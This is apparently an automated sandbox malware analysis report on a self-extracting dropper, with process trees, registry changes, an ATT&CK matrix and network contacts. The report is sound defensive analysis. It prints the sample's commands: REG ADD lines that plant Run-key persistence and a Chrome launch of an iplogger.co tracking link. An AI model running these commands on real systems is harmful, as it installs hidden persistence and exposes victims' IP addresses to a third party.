Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00888BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00888BD0
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\NetstatJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_03
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxname0_2_0088C131
Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxstime0_2_0088C131
Source: C:\Users\user\Desktop\file.exeCommand line argument: STARTDLG0_2_0088C131
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1980,i,4637800445937414229,16644580557611955956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1980,i,4637800445937414229,16644580557611955956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ndfapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wdi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: file.exeStatic file information: File size 4963581 > 1048576
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_3980828Jump to behavior
Source: SourceMod_Setup.exe.0.drStatic PE information: section name: .symtab
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088D8B6 push ecx; ret 0_2_0088D8C9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088CDF0 push eax; ret 0_2_0088CE0E

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exeJump to dropped file
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0087A273
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0088A537
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088C8D5 VirtualQuery,GetSystemInfo,0_2_0088C8D5
Source: file.exe, 00000000.00000003.1682564615.00000000013F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.1682564615.00000000013F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-23536
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0088DA75
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00894A5A mov eax, dword ptr fs:[00000030h]0_2_00894A5A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00898AAA GetProcessHeap,0_2_00898AAA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0088DA75
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088DBC3 SetUnhandledExceptionFilter,0_2_0088DBC3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00895B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00895B53
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0088DD7C
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4Jump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088D8CB cpuid 0_2_0088D8CB
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0088932F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_0088C131
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087A8E0 GetVersionExW,0_2_0087A8E0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts12
Command and Scripting Interpreter
1
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Modify Registry
LSASS Memory121
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS24
System Information Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1565648 Sample: file.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 68 38 Multi AV Scanner detection for dropped file 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Sigma detected: New RUN Key Pointing to Suspicious Folder 2->42 44 AI detected suspicious sample 2->44 8 file.exe 9 2->8         started        process3 file4 26 C:\Users\Public\...\SourceMod_Setup.exe, PE32 8->26 dropped 11 cmd.exe 1 14 8->11         started        process5 signatures6 46 Uses cmd line tools excessively to alter registry or file data 11->46 14 chrome.exe 1 11->14         started        17 conhost.exe 11->17         started        19 reg.exe 1 1 11->19         started        21 reg.exe 1 1 11->21         started        process7 dnsIp8 34 192.168.2.4, 138, 443, 49723 unknown unknown 14->34 36 239.255.255.250 unknown Reserved 14->36 23 chrome.exe 14->23         started        process9 dnsIp10 28 www.google.com 142.250.181.100, 443, 49742, 49781 GOOGLEUS United States 23->28 30 iplogger.co 104.21.82.93, 443, 49735, 49736 CLOUDFLARENETUS United States 23->30 32 172.67.167.249, 443, 49743, 49745 CLOUDFLARENETUS United States 23->32

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe29%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exe25%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://iplogger.co/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.181.100
truefalse
    high
    iplogger.co
    104.21.82.93
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://iplogger.co/1tJFB4false
        unknown
        https://iplogger.co/favicon.icofalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.opengis.net/gmlfile.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
          high
          https://github.com/go-sql-driver/mysql/wiki/strict-modeThefile.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
            high
            https://discord.com/illegalfile.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
              high
              http://www.collada.org/2005/11/COLLADASchemafile.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                high
                http://www.topografix.com/GPX/1/1file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                  high
                  http://earth.google.com/kml/2.2file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                    high
                    http://earth.google.com/kml/2.0file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                      high
                      http://earth.google.com/kml/2.1file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                        high
                        http://www.opengis.net/kml/2.2file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                          high
                          https://status.discord.com/api/v2/i/ofile.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                            high
                            https://cdn.discordapp.com/illegalfile.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                              high
                              https://github.com/go-sql-driver/mysql/wiki/old_passwordsfile.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                                high
                                https://discord.com/developers/docs/reference#authentication-example-bot-token-authorization-headerfile.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.drfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  104.21.82.93
                                  iplogger.coUnited States
                                  13335CLOUDFLARENETUSfalse
                                  142.250.181.100
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  172.67.167.249
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  IP
                                  192.168.2.4
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1565648
                                  Start date and time:2024-11-30 12:46:08 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 54s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:12
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal68.winEXE@23/5@6/5
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 88
                                  • Number of non-executed functions: 82
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.238, 64.233.165.84, 34.104.35.123, 199.232.210.172, 192.229.221.95, 172.217.17.67, 172.217.17.78
